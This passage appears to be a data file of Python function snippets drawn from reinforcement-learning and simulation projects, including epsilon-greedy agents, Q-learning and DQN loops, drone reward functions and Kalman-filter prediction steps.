get_win_status(sess)\n sess_preds = model.predict(inputs)\n fix_rewards(sess_preds, win_status)\n \n # Calculating according to the expanded tree:\n move_preds = np.zeros((len(legal_moves), 4))\n for j, move in enumerate(prob_dict):\n for sess_index in prob_dict[move]:\n # print('\\n\\n')\n # print(f'i is is {i}, move is {move}, sess_index is {sess_index}')\n # print(f'sess_preds shape is {sess_preds.shape}')\n # print(f'prob_dict is {prob_dict}')\n move_preds[j,:] += prob_dict[move][sess_index] * sess_preds[sess_index,:]\n return move_preds", "def _predict(self):\n if self.net:\n # divide board\n # this means reverting changes to the env, test_env, and agent.py\n boards = []\n for child in self.children:\n boards.append(child.env.separate_players())\n boards = np.array(boards)\n boards = np.reshape(boards, (-1, boards.shape[1], boards.shape[2]) )\n # assign Q, pi from net\n Q, pi = self.net.model.predict_on_batch(boards)\n for i,child in enumerate(self.children):\n child.Q = Q[i][0]\n child.pi = pi[i]\n if not child.done(): child.pi[child.pi==0] = 1/len(child.env.legal_moves())\n #child.pi = np.random.dirichlet(pi*self.expl + 1) # add noise\n\n # set pi and Q for initial node\n if not self.parent: \n self.pi = np.ones(7) / 7\n self.Q = 0\n\n else:\n Q = 0 # unkown outcome\n pi = np.zeros(7)\n legal_moves = self.env.legal_moves()\n n_moves = len(legal_moves)\n if 
n_moves: pi[legal_moves] = 1/n_moves\n return Q, np.array(pi)", "def reset(self, evaluate=False):\n self.reset_env()\n for _ in range(20):\n self.__publish_cmd(0.0, 0.0)\n self.rate.sleep()\n self.__publish_cmd(1.0, 0.0)\n self.rate.sleep()\n self.prev_pos_index, _ = self.__find_closest_point(1088)\n self.prev_reward = 0.0\n \n \n # If this run isn't being evaluated, we need to add some randomness to the starting point or else the agents will not learn well\n # if not evaluate:\n # random_steps = np.random.randint(0, 20)\n # ref = self.ref_track\n # l = len(ref)\n # curr_pos_index, _ = self.__find_closest_point(self.prev_pos_index)\n # for _ in range(random_steps):\n # ranges = self.get_state()\n # max_range = np.max(ranges)\n # indices = np.where(ranges>=max_range)\n # target_index = np.mean(indices)\n # angle = ((2 * self.lidar_angle) / len(ranges)) * target_index - self.lidar_angle\n \n # # future_pos_index = (curr_pos_index + 20) % l\n # # goal_point = ref[future_pos_index]\n # # print(goal_point)\n # # curr_pos = copy.copy(self.pos) # [x, y, yaw, speed]\n # # dx = goal_point[0] - curr_pos[0]\n # # dy = goal_point[1] - curr_pos[1]\n # # yaw = curr_pos[2]\n # # xgv = (dx * np.cos(yaw)) + (dy * np.sin(yaw))\n # # ygv = (-dx * np.sin(yaw)) + (dy * np.cos(yaw))\n # # angle = -np.arctan2(ygv,xgv)\n # # print(angle)\n # self.step(angle)\n # curr_pos_index, _ = self.__find_closest_point(curr_pos_index)\n \n # self.prev_pos_index = copy.copy(curr_pos_index)\n\n \n # print(self.prev_pos_index)\n\n return", "def act(self, state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.n_actions)\n act_values = self.model.predict(state)\n return np.argmax(act_values[0])", "def move_simulation(self):\n import simulation\n\n dt = 1e-3 # Pas de temps en seconde.\n x, y = [], []\n state = simulation.State() # On positione la voiture a l'origine\n for i, t in enumerate(np.arange(0, self.portion_duration*self.nbr_portions, dt)):\n state.update(*self(t), dt=dt)\n if not i % 1000:\n x.append(state.x)\n y.append(state.y)\n\n # self.score = x[-1]**2 + y[-1]**2 # Bidon et mal fait, c'est juste pour le test.\n # self.score = y[-1]-abs(x[-1])\n # self.score = 1 / ( (self.arriveeX*self.nbr_portions/10.0-x[-1])**2 + (self.arriveeY*self.nbr_portions/10.0-y[-1])**2 ) # Tout droit jusqu'au point choisi\n self.score = 1 / ( (self.arriveeX*self.nbr_portions*4.0/20-x[-1])**2 +\n (self.arriveeY*self.nbr_portions*4.0/20-y[-1])**2 ) # Le point choisi dépend du point standard (0.1) et de nbr_portions\n\n return x, y", "def take_action(self, observation):\r\n if (np.random.rand() <= self.epsilon):\r\n action = random.randrange(self.action_size)\r\n return action\r\n act_values = self.model.predict(observation) # Forward Propagation\r\n action = np.argmax(act_values[0])\r\n return action", "def rtest_predictoutcome():\n\n #define cohort size\n npatients = 2\n\n #init healthy patients\n simulator = AbbcEnvironment(patients=npatients)\n\n #simulate healthy patients for long term in short term increments\n nstep = int(long_term/short_term)\n\n #define action taken : -1 means patients will be simulated as healthy\n action = np.repeat(-1, npatients)\n\n #init episode list\n episode = [simulator.state]\n\n #main simulation loop to generate episodes\n for step in range(nstep):\n episode += simulator.take_action(action=action, simtime=short_term)\n\n #episode length is 1+2*nstep consisting of intit state (5xnpat) followed by\n # next state and reward (1xnpat) repeating each time step.\n #print(episode)\n 
#print(len(episode))\n\n #---semi gradient temporal difference (0) algorithm ---\n #init hyperparameters\n alpha = .1 #learning rate\n #init Value function model\n agent = AbbcAgent(discount=1.0)\n #loop over episodes\n for patient in range(npatients):\n #state = [nstep]\n #state += episode[0][:,patient] #get inital state\n state = np.append(episode[0][:,patient],nstep).reshape((6,1)) #get inital state\n\n print(state)\n #loop over time steps in episode\n for k in range(1,nstep+1):\n #get next state and reward\n #nextstate = [nstep-k]\n #nextstate = episode[k*2-1][:,patient]\n nextstate = np.append(episode[k*2-1][:,patient],nstep-k).reshape((6,1))\n\n reward = episode[k*2][patient]\n\n #get magnitude for forces\n magnitude = alpha * (reward + agent.discount * agent.get_value(nextstate)\n - agent.get_value(state))\n #compute forces\n forces = computeforces(agent.prednet, state, 0, \"iden\")\n\n #update model\n for layer in forces:\n index = layer[\"layer\"]\n agent.prednet[index][\"weight\"] += magnitude * layer[\"fweight\"]\n agent.prednet[index][\"bias\"] += magnitude * layer[\"fbias\"]\n\n state = np.copy(nextstate)\n\n\n #make predictions\n state = np.append(episode[0][:,patient],nstep).reshape((6,1)) #get inital state\n print(agent.get_value(state))\n\n #Value function approximates outcome return at time horizon.\n assert(False)\n\n ##define action taken\n #action = np.repeat(2, npatients)\n ##main simulation loop\n #for step in range(nstep):\n # _, drugy_reward[step,:] = simulator.take_action(action=action, simtime=short_term)", "def predict(self, delta):\n self.position = self.sensor_model.sample_prediction(self.position+delta)", "def act(self, observer):\n # get state and extract the q matrix values #\n state = self.get_state(observer)\n q = self.q_mat[int(state), :].tolist()[0]\n\n # can't have negative probs, so scale everything to be nonnegative\n q = [i + min(q) for i in q]\n\n max_q = max(q)\n\n if random.random() < self.epsilon:\n # get raw rewards and compute the normalization const. #\n # print(q)\n probs = [i + (max_q + 0.01)*np.random.rand() for i in q]\n sum_probs = sum(probs)\n\n # normalize to probabilities\n probs = [float(i)/sum_probs for i in probs]\n\n # make a choice based on q matrix #\n action_ind = np.random.choice(range(len(q)), p = np.array(probs))\n else:\n # what does this do? 
\n maxes = [i for i, x in enumerate(q) if x == max_q]\n action_ind = np.random.choice(maxes)\n\n action = self.actions[action_ind]\n self.prev_state = int(state)\n self.prev_action = int(action_ind)\n\n return action\n\n # possible movements\n # options = [NORTH, SOUTH, WEST, EAST]\n # prob_wght = 0.1\n #\n # if(self.prev_posn is None):\n # # random choice if first move\n # return random.choice(options)\n # else:\n # # augment probabilities based on previous posn\n # tuple_diff = tuple(np.subtract(self.posn, self.prev_posn))\n # # tuple_diff = (0, 1)\n # probs = [0.25 + prob_wght*tuple_diff[1],\n # 0.25 - prob_wght*tuple_diff[1],\n # 0.25 - prob_wght*tuple_diff[0],\n # 0.25 + prob_wght*tuple_diff[0]]\n # # print(probs)\n # return np.random.choice(options, size=1, p=probs)[0]", "def simulation():\n # initialize action set\n action_set = np.zeros(int((s.MAX_INSPECT - s.MIN_INSPECT) / s.DELTA) + 3)\n x, i = s.MIN_INSPECT, 1\n while x <= s.MAX_INSPECT:\n action_set[i] = x\n x += s.DELTA\n i += 1\n action_set[-1] = np.inf\n action_number = len(action_set)\n\n # initialize current state\n current_state = math.floor(np.random.rand(1) * s.NUM_STATES)\n\n # initialize action index\n if current_state == 0:\n action_index = 0\n elif current_state == s.NUM_STATES - 1:\n action_index = action_number - 1\n\n if current_state != 0 and current_state != s.NUM_STATES - 1:\n action_index = action_number - 2\n\n # initialize policy set\n greedy_policy = np.zeros(s.NUM_STATES)\n greedy_policy[-1] = np.inf\n for i in range(1, s.NUM_STATES - 1):\n greedy_policy[i] = s.MAX_INSPECT\n\n visit_times = np.zeros([s.NUM_STATES, action_number])\n\n # initialization for simulation\n falpha, Aalpha, delay_T, uni_parameter = equivalent_markov(greedy_policy)\n stable_prob, potential = stable_potential(falpha, Aalpha, uni_parameter)\n last_value = falpha + np.matmul(Aalpha, potential)\n dis_value = last_value\n # ave_vector = np.matmul(stable_prob, falpha)\n # ave_estimate = ave_vector.tolist()\n each_transit_cost, each_transit_time, total_reward = (0 for i in range(3))\n\n # initialize DQN model if selected\n dqn = DQN() if MODEL == 1 else None\n # initialize Q-table if Q-learning selected\n q_factor = ql.init_q_factor(action_number) if MODEL == 2 else None\n\n for out_step in range(s.EPOCH):\n epsilon = s.EPSILON_1 if MODEL == 1 else s.EPSILON_2\n\n for inner_step in range(s.EPOCH_LEARN):\n\n visit_times[current_state, action_index] += 1\n current_action = greedy_policy[current_state]\n\n inspect_cost = 0 if current_state == s.NUM_STATES - 1 else s.K5 * current_action\n\n flag, sojourn_T, service_T, next_state = state_transition(current_state, current_action)\n each_transit_time = s.DISCOUNT * each_transit_time + (sojourn_T - each_transit_time) / pow(\n out_step * s.EPOCH_LEARN + (inner_step + 1), s.Q_AVE_STEP)\n end_sojourn_T = math.exp(- s.ALPHA * sojourn_T)\n end_serve_T = math.exp(- s.ALPHA * service_T)\n\n if s.ALPHA == 0:\n dis_T, dis_serve_T, dis_wait_T = sojourn_T, service_T, sojourn_T - service_T\n else:\n dis_T, dis_serve_T = (1 - end_sojourn_T) / s.ALPHA, (1 - end_serve_T) / s.ALPHA\n dis_wait_T = (end_serve_T - end_sojourn_T) / s.ALPHA\n\n if flag == 0: # no processing, waiting\n cost_real = (s.K1 * (s.NUM_STATES - current_state) + s.K3) * sojourn_T + inspect_cost\n cost_purt = (s.K1 * (s.NUM_STATES - current_state) + s.K3) * dis_T + inspect_cost\n else: # no waiting, processing\n cost_real = s.K1 * (s.NUM_STATES - current_state - 1) * sojourn_T + s.K2 * service_T + s.K3 * (\n sojourn_T - service_T) + s.K4 + 
inspect_cost\n cost_purt = s.K1 * (s.NUM_STATES - current_state - 1) * dis_T + s.K2 * dis_serve_T + s.K3 * dis_wait_T \\\n + s.K4 * end_serve_T + inspect_cost\n\n each_transit_cost = s.DISCOUNT * each_transit_cost + (cost_real - each_transit_cost) / (\n pow(out_step * s.EPOCH_LEARN + (inner_step + 1), s.Q_AVE_STEP))\n\n ave_q_cost = each_transit_cost / each_transit_time\n # ave_estimate.append(ave_q_cost)\n cost_dis = cost_purt - ave_q_cost * dis_T\n\n if MODEL == 1:\n reward = - cost_dis\n dqn.store_transition(current_state, action_index, reward, next_state)\n if dqn.memory_counter >= s.MEMORY_CAPACITY:\n dqn.learn(s.EPOCH_LEARN, inner_step, PS)\n else:\n difference = cost_dis + end_sojourn_T * min(q_factor[next_state, :]) \\\n - q_factor[current_state, action_index]\n q_factor = ql.update_q_factor(q_factor, current_state, action_index, difference,\n visit_times, inner_step, PS)\n current_state = next_state # transit to next state\n\n if current_state == 0:\n action_index = 0\n elif current_state == s.NUM_STATES - 1:\n action_index = action_number - 1\n else:\n if MODEL == 1:\n action_index = int(dqn.choose_action(current_state, epsilon))\n if action_set[action_index] <= 1:\n greedy_policy[current_state] = action_set[action_index]\n else:\n greedy_policy[current_state] = 1\n else:\n if np.random.rand(1) < epsilon:\n action_index = int(np.floor(np.random.rand(1) * (action_number - 2)) + 1)\n else:\n # minimal_q_value = np.min(q_factor[current_state, :])\n action_index = np.argmin(q_factor[current_state, :])\n greedy_policy[current_state] = action_set[action_index]\n\n # store the policy learned from the iterations\n optimal_policy = greedy_policy\n\n if MODEL != 1:\n for i in range(1, s.NUM_STATES - 1):\n # minimal_q_value_temp = np.min(q_factor[i, :])\n action_index_temp = np.argmin(q_factor[i, :])\n optimal_policy[i] = action_set[action_index_temp]\n\n falpha, Aalpha, delay_T, uni_parameter = equivalent_markov(optimal_policy)\n stable_prob, potential = stable_potential(falpha, Aalpha, uni_parameter)\n\n last_value = falpha + np.matmul(Aalpha, potential)\n dis_value = np.concatenate((dis_value, last_value), axis=1)\n total_reward += - np.ndarray.item(last_value[0])\n # new_ave_cost = np.matmul(stable_prob, falpha)\n # ave_vector = np.concatenate((ave_vector, new_ave_cost))\n print(\"epoch: {} , the epoch reward is {}\".format(out_step, round(- np.ndarray.item(last_value[0]), 2)))\n\n # result = np.asarray(dis_value)\n print(\"total reward:\", total_reward)\n\n return dis_value, total_reward", "def move(self):\n if self._z >= 75:\n a = random.random()\n print(str(a))\n if a < 0.2:\n self._z += 1\n if a > 0.2 and a < 0.9:\n self._z -= 1\n if a > 0.9:\n self._z = self._z\n else: \n self._z -= 1\n \n b = random.random()\n print(str(b))\n if b < 0.1:\n self._y += 1\n if b > 0.1 and b < 0.2:\n self._y -= 1\n if b > 0.2 and b < 0.25:\n self._x -= 1\n if b > 0.25:\n self._x += 1", "def get_reward(self):\n \n pos_error = np.sum(abs(self.sim.pose[:3] - self.target_pos[:3]))\n pos_error = np.log(pos_error)\n z_error = abs(self.sim.pose[2] - self.target_pos[2])\n velocity_error = np.dot(np.subtract(1, np.tanh(self.sim.pose[:3])), self.sim.v)\n reward = 1. 
- pos_error - 0.02 * z_error\n #reward = 1 - z_error - xy_erro, r/800 - ((1-z_error)*z_v/100) - angv/20\n reward = np.clip(reward, -2, None)\n\n #reward = np.maximum(np.minimum(reward, max_reward), min_reward)\n\n return reward", "def act(self, state):\n\t\trand_val = np.random.rand()\n\t\tif not self.is_eval and rand_val <= self.epsilon: # Do a random action only in train phase\n\t\t\treturn random.randrange(self.action_size)\n\n\t\tif self.firstIter: # If this is the first iteration, just do a \"hold\" action\n\t\t\tself.firstIter = False\n\t\t\treturn 2 # 2 = \"Hold action\"\n\n\t\toptions = self.model.predict(state) # Do a prediction based on a specific observation\n\t\t#print(options)\n\n\t\ttot = np.sum(options[0])\n\t\toptions[0] = options[0] / tot\n\t\t#print(options)\n\n\t\trand = random.random()\n\n\t\t#print(\"randm:\" + str(rand))\n\t\tif rand <= options[0][0]:\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 0\")\n\t\t\treturn 0\n\n\t\telif options[0][0] < rand <= (options[0][0] + options[0][1]):\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 1\")\n\t\t\treturn 1\n\t\telif (options[0][0] + options[0][1]) < rand <= (options[0][0] + options[0][1] + options[0][2]):\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 2\")\n\t\t\treturn 2\n\t\telse:\n\t\t\t#print(\"max:\" + str(np.argmax(options[0])) + \"ma 3\")\n\t\t\treturn 3\n\n\t\t#return np.argmax(options[0])'''", "def simulate(board, move):\n reward = 0\n\n board.apply_white_move(move)\n if board.cur_player_won() == 1:\n reward = 1\n elif board.cur_player_won() == 2:\n reward = -1\n elif board.cur_player_won() == 0:\n reward = -.25\n\n return board, reward", "def get_prediction(self, trump, num_players):\n prediction = random.randrange(len(self.hand))\n self.prediction = prediction\n return prediction", "def training_policy(self, state):\n if self.epsilon > random.random():\n return random.randint(0, 1)\n return self.policy(state)", "def chooseAction(self, epsilon, state):\n if random.uniform(0, 1) < epsilon:\n return random.randrange(9)\n\n cur_best_val = -float('inf')\n cur_best_action = 0\n\n data = env.getAllNextStates(state)\n\n with torch.no_grad():\n for action, next_state, done in data:\n if next_state != state:\n value = self.NN(self.RBF[next_state]).item() if not done else 0\n if value > cur_best_val:\n cur_best_val = value\n cur_best_action = action\n #print(data)\n return cur_best_action", "def update_dead_reckoning(self):\n now = time.time()\n time_diff_s = now - self._last_observation_s\n self._last_observation_s = now\n\n self._prediction_step(time_diff_s)", "def take_action(self, state):\n if self.epsilon_decay is not None:\n self.epsilon *= self.epsilon_decay\n if random.random() < self.epsilon:\n action = super(BaseQAgent, self).random_next_action(state)\n self.log('exploration move: {0}'.format(str(action)))\n else:\n action = self.greedy_next_action(state)\n self.log('exploitation move: {0}'.format(str(action)))\n return action", "def get_delta_distance_reward(self, previous_pos, new_pos):\n #cosine = np.dot(self.target_pos-previous_pos, new_pos-previous_pos)/((np.dot(self.target_pos-previous_pos,self.target_pos-previous_pos) * np.dot(new_pos-previous_pos,new_pos-previous_pos))**(0.5)+0.0001)\n dist_new=np.dot(new_pos-self.target_pos,new_pos-self.target_pos)**(0.5)\n dist_old=np.dot(previous_pos-self.target_pos,previous_pos-self.target_pos)**(0.5)\n if dist_old<=2.5*self.target_margin:\n reward=1000*self.total_distance\n print(\"\\nSUCESS!!!!!\")\n self.success=1\n #if 
cosine>=0:\n #reward=self.runtime\n elif self.hit_the_bounds(new_pos):\n reward=-500*self.total_distance\n else:\n reward=-7.5*dist_old/self.total_distance\n \n if dist_new<=5*self.target_margin:\n print(\"$$$$$ Almost there $$$$$\")\n if np.sign(dist_old-dist_new)==-1:\n print(\"%%%%%% Moving away :( %%%%\")\n else:\n print(\"%%%% Moving closer :) %%%%\") \n elif dist_new<=10*self.target_margin:\n print(\"$$$$$ Getting there $$$$$\")\n if np.sign(dist_old-dist_new)==-1:\n print(\"%%%%%% Moving away :( %%%%\") \n else:\n print(\"%%%% Moving closer :) %%%%\")\n \n return reward", "def evaluate_position(num_items):\n comp_wins = 0\n player_wins = 0\n\n initial_move = random.randrange(MAX_REMOVE + 1)\n num_items -= initial_move\n next_move = random.randrange(MAX_REMOVE + 1)\n \n\n\n\n\n\n \n \n return 0", "def predict_outcome(self, game:'Game') -> float: # noqa: E0602, F821\n response = self.__send_game(game)\n return response[1]", "def generate_prediction(self, model, verbose=False):\n #self.confidence = confidence # set confidence for test 90%, 95% (default), 99%\n #\n self.observation[\"created_later\"] = \"generate_prediction\"\n #print(self.observation)\n print(self.observation[\"created_later\"])\n return 666.", "def predict(self, observation, *args, **kwargs):\n if self.env is not None and np.random.rand() <= self.epsilon:\n action = random.randrange(self.action_size)\n else:\n act_values = self.policy.predict(observation)\n action = np.argmax(act_values[0])\n return action, None", "def nextMoveDecision(self):\n b = random.randint(1, 9) \n while (self.Occupied(b)):\n b = random.randint(1, 9) \n return b", "def move(self):\n if self.learn is None:\n return random.choice(moves)\n else:\n return self.storedmove", "def process_simulation(self):\n for i in range(self._n):\n probability = self._alpha / float(self._alpha + i - 1)\n tmp = np.random.uniform(size=(1,))\n if tmp < probability:\n self._results.append(np.random.normal(1))\n else:\n self._results.append(np.random.choice(self._results[:i-1], 1)[0])", "def calc_epsilon(y_true, y_pred, weights):\n return float(np.dot(weights, y_pred == y_true))", "def get_reward(self):\n #original reward function: reward = 1.-.3*(abs(self.sim.pose[:3] - self.target_pos)).sum()\n thrusts = self.sim.get_propeler_thrust(self.sim.prop_wind_speed)\n linear_forces = self.sim.get_linear_forces(thrusts)\n distance = np.linalg.norm(self.target_pos - self.sim.pose[:3])\n #speed = math.sqrt(np.square(self.sim.find_body_velocity()).sum())\n #with 300x300x300m env, the max distance from one corner to another is 519\n max_distance = 519\n #Focus quadcopter on not crashing but first rewarding an upward linear force until at the height of the target\n if self.sim.pose[2] < self.target_pos[2]:\n #velocity_discount = 1/speed\n reward = np.tanh(linear_forces[2])\n #after getting to the correct z-coordinate, move to the correct y-coordinate\n elif self.sim.pose[1] < self.target_pos[1]:\n #velocity_discount = 1/speed\n reward = 1 + np.tanh(linear_forces[1])\n #finally, after getting rewards for the x and y coordinates, give reward for distance\n #at this stage, the drone will have overshot the x and y coordinates, but it would be in a better area to\n #start searching for the x coordinate\n elif distance > 1 and self.sim.pose[2] > self.target_pos[2] and self.sim.pose[1] > self.target_pos[1] :\n reward = 2 + (1-math.pow((distance/300),.04))\n elif distance < 1:\n self.success = True\n reward = 100\n #possible reward for hover: np.exp(-np.square(linear_forces[2]))\n return 
reward", "def randomMove(self, game):\n #time.sleep(0.25)\n return random.choice(game.get_all_legal_moves())", "def prediction_step(self,delta_t,v,om,x_k_1,P_k_1,Q,jacobian,motion_model):\n\n\t\t# Motion Model Returns the states [x,y,theta]\n\t\tx_k_1[0],x_k_1[1],x_k_1[2] = motion_model(v,om,x_k_1[0],x_k_1[1],x_k_1[2],delta_t) \n \n\t\t#Jacobian of Motion Model w.r.t last state and Noise \n\t\tF, L = jacobian(v,x_k_1[2],delta_t)\n\n\t\t# Predicted Co-Variance\n\t\tP_k_1 = F.dot((P_k_1).dot(F.T)) + L.dot((Q).dot(L.T))\n\n\t\treturn x_k_1,P_k_1", "def train(self, game_life):\n rewards = [obs.get('reward') for obs in game_life]\n cum_rewards = sum(rewards)\n\n # manage the graphics\n self.reward_graph.append(cum_rewards)\n plt.plot(self.reward_graph)\n x, y, z = peri_bounding_box\n\n # The amound of nudge\n if cum_rewards:\n displacement = cum_rewards * self.displacement\n else:\n displacement = 0 - self.displacement\n\n # Store observations and perturbed predictions\n data, targets = [], []\n\n for obs in game_life:\n\n # Perturb action\n action, prediction = obs.get('action')\n if self.epsilon and (random.uniform(0, 1.0) < self.epsilon):\n action = random.randrange(18)\n\n # Copy\n update = list(prediction)\n\n # Update only the target action\n update[0][action] = update[0][action] + displacement\n\n\n data.append(\n # Apply bounding box before appending\n np.array(obs.get('observation')[x[0]:x[1], y[0]:y[1], :])\n )\n\n\n update = np.array(update).reshape(1,18),\n targets.append(update)\n\n if data and len(data) > 15:\n # Image processing\n datagen = preprocessing.image.ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n datagen.fit(data)\n\n # Training data generator\n train = datagen.flow(np.array(data), np.squeeze(np.array(targets)),\n batch_size=16)\n\n # Finally train\n self.graph.fit_generator(train, steps_per_epoch=len(data)/16,\n epochs=30, verbose=0,\n callbacks=[\n callbacks.EarlyStopping(monitor='acc'),\n # callbacks.ModelCheckpoint() ?\n ]\n )", "def predict_plan(self, time_step: TimeStep, state: PlannerState,\n epsilon_greedy):\n pass", "def decision():\n return random.random() > 0.5", "def act(self):\n\n self.state = self.next_state\n self.choose_random = np.random.uniform(0., 1.) 
< self.epsilon\n # If exploring\n if self.choose_random:\n # Select a random action using softmax\n idx = np.random.choice(4)\n self.action = self.idx2act[idx]\n else:\n # Select the greedy action\n self.action = self.idx2act[self.argmaxQsa(self.state)]\n\n self.reward = self.move(self.action)\n self.total_reward += self.reward", "def _dense_reward(self) -> float:\n y = 1\n target_goal_dists = []\n for target_shape in self.__debris_shapes:\n target_pos = target_shape.shape_body.position\n goal_pos = (target_pos[0], y) # Top of screen.\n dist = np.linalg.norm(target_pos - goal_pos)\n if target_pos[1] > 0.88:\n dist = 0\n target_goal_dists.append(dist)\n target_goal_dists = np.mean(target_goal_dists)\n return -1.0 * target_goal_dists", "def sample_prediction(self, predicted_position):\n return predicted_position + randn()*self.odom_noise_rate", "def policies(self, QTable, epsilon, state, next_states, action_to_do): # Inspiration from https://www.geeksforgeeks.org/q-learning-in-python/?fbclid=IwAR1UXR88IuJBhhTakjxNq_gcf3nCmJB0puuoA46J8mZnEan_qx9hhoFzhK8\r\n num_actions = 5 # 5 actions-value, [moved_out, into_goal, send_opp_home, send_self_home, move_token] \r\n def epsilonGreedyPolicy(): \r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n valid_act_len = len(np.where(valid_actions==True)[0])\r\n\r\n Action_probabilities = np.ones(num_actions, dtype = float) * epsilon / valid_act_len # divides probability based on number of valid actions and epsilon (each 0.025 if 4 actions) \r\n Action_probabilities = np.multiply(Action_probabilities, valid_actions)\r\n\r\n # If same values in QTable choose random valid action \r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n Action_probabilities[best_action] += (1.0 - epsilon) # Assigns rest probability to best action so probability sums to 1\r\n\r\n return Action_probabilities \r\n\r\n def greedyPolicy():\r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n\r\n Action_probabilities = np.zeros(num_actions, dtype = float)\r\n\r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n\r\n Action_probabilities[best_action] += 1.0\r\n return Action_probabilities\r\n\r\n\r\n if(self.__chosenPolicy == \"epsilon greedy\"):\r\n return epsilonGreedyPolicy \r\n if(self.__chosenPolicy == \"greedy\"):\r\n return greedyPolicy", "def move(self):\n if random.random() < 0.5:\n self.y = (self.y + 1) % 100\n else:\n self.y = (self.y - 1) % 100\n if random.random() < 0.5:\n self.x = (self.x + 1) % 100\n else:\n self.x = (self.x - 1) % 100", "async def predict(property: Property):\n prediction = model.predict(property.to_df())\n price = np.exp(prediction[0]) \n return '{}$ per night is an optimal price.'.format(round(price))", "def sonarpredict(self):\n\n # Calculate sample 
time --> # finish_time - time that program entered_this_func\n if not self.sample_T:\n sample_T = 1.0/2\n else:\n self.sample_T = self.finish_time - start_time\n start_time = time.time()\n\n\n\n # create robot position and orientation state variable\n # initialize it only once after we get first measurement, not here\n x_state_var = np.array([[self.x], [self.y], [self.yaw]])\n\n # control variables (linar and angular velocity)\n u_linear_velocity_x = self.wheel_velocity.linear.x\n w_angular_velocity_theta = self.wheel_velocity.angular.z\n\n u_state_var = np.array([[w_angular_velocity_theta*(sample_T)],\n [u_linear_velocity_x*(sample_T)],\n [0]])\n\n # calculate neccessary error matrix prediction\n A_k = self.calculate_A(u_state_var[1], x_state_var[2], u_state_var[0])\n W_k = self.calculate_W(u_state_var[1], x_state_var[2], u_state_var[0])\n Q_k = self.calculate_Q(u_state_var[0])\n\n # calculate x_prior in k+1\n self.x_prior = self.predict_x_next(x_state_var, u_state_var, [0, 0, 0])\n\n # calculate P_prior in k+1\n self.P_prior = self.predict_P_next(A_k, self.P_k, W_k, Q_k)\n\n #print('nonlinear_func', self.nonlinear_function(x_state_var, u_state_var, [0, 0, 0]))\n\n sonar_sim_list = []\n sonar_sim_list = map(self.hit_sonar , [x for x in range(15) if x % 2])\n # sonar_sim_list_append = sonar_sim_list.append\n # for i in [x for x in range(15) if x%2]:\n # sonar_sim_list.append(self.hit_sonar(i))\n\n # estimated obstacle location with good obstacles\n object_loc = [x[-1] for x in sonar_sim_list if abs(x[0]-x[1]) < 0.8]\n\n # sonar diffs (y(k+1) - h(x(k+1), 0)\n self.sonar_diffs = [x[1] - x[0] for x in sonar_sim_list if abs(x[0] - x[1]) < 0.8]\n\n #H_matrix = self.calculate_H(sonar_sim_est[0], sonar_sim_est[1])\n H_matrix = self.calculate_H(object_loc)\n\n # these are correct\n V_matrix = np.eye(H_matrix.shape[0])\n R_matrix = np.eye(H_matrix.shape[0])*self.sensor_var\n\n return(H_matrix, V_matrix, R_matrix)", "def evaluate_prediction(self):\n\n # ratio_train = self.evaluate_data(self.train_x, self.train_y)\n ratio_test = self.evaluate_data(self.test_x, self.test_y)\n\n print(\"\\n*NAIVE BAYES:\")\n # print(\"Test1: {}%\".format(ratio_dev*100))\n print(\"Test: {} %\".format(ratio_test*100))", "def env_step(self, action):\n random_prob = np.random.uniform(0, 1)\n if random_prob <= self.stochasticity: # Ignore agent's action and move to one of the 8 neighbours\n # Determine how the agent moves (from -1 to 1 in each direction, but not both 0)\n random_nn = np.random.randint(0, len(self.nn))\n random_y = self.nn[random_nn, 0]\n random_x = self.nn[random_nn, 1]\n\n # Move to one of the nearest neighbours\n self.current_state[0] += random_y\n self.current_state[1] += random_x\n else: # Perform agent's action\n # Update current stated based on the action the agent took\n curr_x = self.current_state[1]\n self.current_state[0] += self.actions[action][0] + self.wind[curr_x]\n self.current_state[1] += self.actions[action][1]\n\n # Check if the agent fell out of the boundaries of the grid world\n y_coord = self.current_state[0]\n x_coord = self.current_state[1]\n\n if y_coord >= self.num_rows: # Agent went too far up\n self.current_state[0] = self.num_rows - 1\n elif y_coord < 0: # Agent went too far down\n self.current_state[0] = 0\n\n if x_coord >= self.num_cols: # Agent went too far right\n self.current_state[1] = self.num_cols - 1\n elif x_coord < 0: # Agent went too far left\n self.current_state[1] = 0\n\n is_terminal = False\n reward = -1.0\n\n # Check if the agent reached a terminal state\n if 
self.current_state == self.terminal_state:\n is_terminal = True\n reward = 0.0\n\n return reward, self.current_state, is_terminal", "def epsilon(current_episode, num_episodes):\n # return 1 - (current_episode/num_episodes)\n return .5 * .9**current_episode", "def predict(self, observation):\n # input must contain past state, so we get it\n (state_mean, state_covariance) = self.update_state()\n\n # print(\"Update state:\", state_mean, state_covariance)\n # predict new state\n # print(\"Previous state:\", state_mean[0],\"\\nObservation:\", observation)\n next_state_mean, next_state_covariance = self.kf.filter_update(state_mean[0], state_covariance[0], observation)\n # print(\"PREDICTION:\", next_state_mean)\n\n # add observation to history\n if not observation:\n self.obs_history.append(-1e8) # todo check out np.ma.compress_rows(np.ma.masked_invalid(trks))\n else:\n self.obs_history.append(observation)\n # print(\"Next state:\", next_state_mean)\n\n # only return position out of the state coordinates pos, vel, acc\n return next_state_mean[0]", "def predict(self, u):\n\n dtheta_l = self.current_state_estimate[0,0]\n dtheta_r = self.current_state_estimate[1,0]\n v = self.current_state_estimate[2,0]\n w = self.current_state_estimate[3,0]\n x = 